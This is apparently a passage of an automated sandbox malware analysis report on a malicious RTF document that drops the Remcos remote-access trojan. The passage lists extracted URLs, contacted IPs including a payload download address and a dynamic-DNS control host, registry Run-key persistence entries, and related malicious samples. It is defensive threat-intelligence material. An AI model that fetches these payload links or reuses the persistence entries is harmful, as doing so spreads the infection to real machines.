                                                  https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                    		high
                                                    https://onedrive.live.com/download?resid=FDB0512DE793B32E%21191&authkey=remcos.exe, 00000019.00000002.496003835.0000000014630000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://support.google.comHremcos.exe, 00000014.00000003.427677327.0000000002095000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comremcos.exe, 00000010.00000002.401505696.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://cache.btrll.com/default/Pix-1x1.gifbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                        		high
                                                        https://www.google.comremcos.exe, 00000010.00000002.401505696.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://live.com/4remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://live.com/7remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://103.198.26.173/360/HJC.exehhC:EQNEDT32.EXE, 00000002.00000002.354533664.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://geoplugin.net/json.gp/Chjc.exe, 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.848171681.00000000157EB000.00000040.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399844258.0000000014D2B000.00000040.00000800.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.436864812.000000001588B000.00000040.00000800.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.469944205.000000001550B000.00000040.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 00000018.00000002.471719434.0000000014E7B000.00000040.00000800.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.496351890.00000000158EB000.00000040.00000800.00020000.00000000.sdmptrue
                                                              • URL Reputation: phishing
                                                              		unknown
                                                              https://live.com/9remcos.exe, 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://o.aolcdn.com/ads/adswrappermsni.jsbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                  		high
                                                                  http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                    		high
                                                                    http://www.msn.com/?ocid=iehpbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                      		high
                                                                      https://live.com/hjc.exe, 00000005.00000003.369181364.0000000000330000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                          		high
                                                                          http://static.chartbeat.com/js/chartbeat.jsbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                            		high
                                                                            http://www.msn.com/de-de/?ocid=iehpbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                              		high
                                                                              https://onedrive.live.com/download?resid=FDB0512DE79remcos.exe, 00000019.00000002.496112461.000000001477B000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvF6ED.tmp.13.drfalse
                                                                                  		high
                                                                                  http://www.imvu.com/#remcos.exe, 00000016.00000002.425524376.000000000018C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.nirsoft.net/remcos.exe, 00000010.00000002.401505696.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://ocsp.entrust.net0Dhjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                        		high
                                                                                        http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                          		high
                                                                                          https://live.com/-hjc.exe, 00000005.00000002.372380692.00000000002EA000.00000004.00000020.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                              		high
                                                                                              https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                		high
                                                                                                http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                  		high
                                                                                                  http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                    		high
                                                                                                    https://www.ccleaner.com/go/app_cc_pro_trialkeybhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                      		high
                                                                                                      https://sectigo.com/CPS0hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://support.google.com/chrome/?p=plugin_flremcos.exe, 0000000D.00000003.426556869.0000000002145000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://geoplugin.net/json.gpgremcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://crl.entrust.net/server1.crl0hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://oqgpra.db.files.1drv.com/y4mYCQQoHB3biLh5JPth5_f-kOB87DNi8p0jtMSHrwPoPCEVl-mpqMaKw_mqKIpuxjnremcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://contextual.media.net/8/nrrV73987.jsbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                              		high
                                                                                                              http://www.imvu.comremcos.exe, 00000010.00000002.401505696.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 00000010.00000002.401754477.0000000001F17000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000016.00000002.426363585.0000000001D47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://oqgpra.db.files.1drv.com/y4m1QphtspBBMGygafIGFYGxEUuSWjKY2dMrUpXGeJNpqtj0i_A5B0XA1Aj7IMN8zjTremcos.exe, 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://contextual.media.net/bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                                    		high
                                                                                                                    https://oqgpra.db.files.1drv.com/y4mpZajfWPqKjdE4uGrq5tmWJHmffdrvebeUi1KiWBx9grNpUr-Q2JlZ3LArHG3A_O0hjc.exe, 00000005.00000003.369181364.0000000000330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                                        		high
                                                                                                                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvF6ED.tmp.13.drfalse
                                                                                                                          		high
                                                                                                                          https://oqgpra.db.files.1drv.com/y4mpZhjc.exe, 00000005.00000002.372380692.0000000000345000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://support.google.com/chrome/hremcos.exe, 0000000D.00000003.426556869.0000000002145000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.msn.com/bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                                                		high
                                                                                                                                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvF6ED.tmp.13.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://www.imvu.com/Tremcos.exe, 00000010.00000002.401481630.000000000018C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0hjc.exe, 00000005.00000002.372380692.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://www.adobe.cremcos.exe, 00000009.00000002.850738765.000000002E060000.00000004.00000001.00020000.00000000.sdmp, remcos.exe, 00000009.00000003.391269695.000000002E060000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427230433.0000000002096000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                                                    		high
                                                                                                                                    https://live.com/vremcos.exe, 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://oqgpra.db.files.1drv.com/y4mTC_XyZRHB379OztWxqX44YH0ZY7OaAZhjXGrl4fCtKBoRTQqeK6A_lQZwfjwKNP7remcos.exe, 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://oqgpra.db.files.1drv.com/y4m8jjd3f9BpBLsSbDI3D4w4BLmop1yruq85sZlFAr-4Rol8mEokjtpsS6ivaddcrG-remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://cdn.at.atwola.com/_media/uac/msn.htmlbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                                                            		high
                                                                                                                                            https://live.com/eremcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                                                                		high
                                                                                                                                                https://secure.comodo.com/CPS0hjc.exe, 00000005.00000002.372380692.00000000002F6000.00000004.00000020.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.pmail.comhjc.exe, hjc.exe, 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://policies.yahoo.com/w3c/p3p.xmlbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                                                                      		high
                                                                                                                                                      http://crl.entrust.net/2048ca.crl0hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://ocsp.sectigo.com0Chjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.msn.com/advertisement.ad.jsbhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://support.google.com/chrome/?p=phremcos.exe, 00000014.00000003.427677327.0000000002095000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://www.ebuddy.comremcos.exe, 00000010.00000002.401505696.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://oqgpra.db.files.1drv.com/y4mio8rSS_2jC5-0VIhrGMPPnTg6gYb3Bxmu9ktmO2sVy1Vu5NgT_hEOa73bPesLFGHremcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high

                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public IPs

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              103.186.117.100
                                                                                                                                                              		kenoss.duckdns.orgunknown
                                                                                                                                                              		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                                                              13.107.137.11
                                                                                                                                                              		dual-spov-0006.spov-msedge.netUnited States
                                                                                                                                                              		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                              103.198.26.173
                                                                                                                                                              		unknownunknown
                                                                                                                                                              		38809NXGNET-AS-APNextgenNetworksAUtrue
                                                                                                                                                              178.237.33.50
                                                                                                                                                              		geoplugin.netNetherlands
                                                                                                                                                              		8455ATOM86-ASATOM86NLfalse

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                              Analysis ID:1430800
                                                                                                                                                              Start date and time:2024-04-24 07:41:06 +02:00
                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 11m 34s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                              Number of analysed new started processes analysed:27
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Sample name:OKhCyJ619J.rtf
                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                              Original Sample Name:956ae61939b3dc9f9bbaed850423740b.rtf
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.phis.troj.spyw.expl.evad.winRTF@29/24@30/4
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 94%
                                                                                                                                                              • Number of executed functions: 81
                                                                                                                                                              • Number of non-executed functions: 135
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .rtf
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Active ActiveX Object
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              • Override analysis time to 64723.2501969976 for current running targets taking high CPU consumption
                                                                                                                                                              • Override analysis time to 129446.500393995 for current running targets taking high CPU consumption

                                                                                                                                                              Warnings

                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.42.12
                                                                                                                                                              • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, db-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-db-files-geo.onedrive.akadns.net, odc-db-files-brs.onedrive.akadns.net
                                                                                                                                                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                              • VT rate limit hit for: OKhCyJ619J.rtf

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              07:41:51API Interceptor339x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                              07:42:00API Interceptor68x Sleep call for process: hjc.exe modified
                                                                                                                                                              07:42:08API Interceptor3511954x Sleep call for process: remcos.exe modified
                                                                                                                                                              07:42:18API Interceptor6x Sleep call for process: Rdxcjsng.PIF modified
                                                                                                                                                              22:42:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rdxcjsng C:\Users\Public\Rdxcjsng.url
                                                                                                                                                              22:42:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1 "C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                              22:42:28AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1 "C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                              22:42:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rdxcjsng C:\Users\Public\Rdxcjsng.url
                                                                                                                                                              22:42:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1 "C:\ProgramData\Remcos\remcos.exe"

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              13.107.137.11Payment Remittance Advice_000000202213.xlsbGet hashmaliciousUnknownBrowse
                                                                                                                                                              • onedrive.live.com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU
                                                                                                                                                              103.198.26.173HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 103.198.26.173/355/HJC.exe
                                                                                                                                                              payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 103.198.26.173/355/HJC.exe
                                                                                                                                                              178.237.33.50fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                              1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                              #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                              TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                              DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                              Quotation.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                              BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                              copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                              payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                              FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                              • geoplugin.net/json.gp

                                                                                                                                                              Domains

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              dual-spov-0006.spov-msedge.netfu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 13.107.139.11
                                                                                                                                                              FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                              • 13.107.139.11
                                                                                                                                                              HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 13.107.137.11
                                                                                                                                                              payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 13.107.137.11
                                                                                                                                                              VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 13.107.139.11
                                                                                                                                                              pSfqOmM1DG.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 13.107.137.11
                                                                                                                                                              https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22)Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                              • 13.107.139.11
                                                                                                                                                              UGS - CRO REQ - KHIDUBAI (OPL-841724).scrGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                              • 13.107.137.11
                                                                                                                                                              SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 13.107.137.11
                                                                                                                                                              XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 13.107.139.11
                                                                                                                                                              geoplugin.netfu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              Quotation.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                              • 178.237.33.50
                                                                                                                                                              payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                              • 178.237.33.50

                                                                                                                                                              ASNs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUS#U5c97#U4f4d#U8865#U52a9#U5236#U5ea6.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 52.184.66.142
                                                                                                                                                              fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
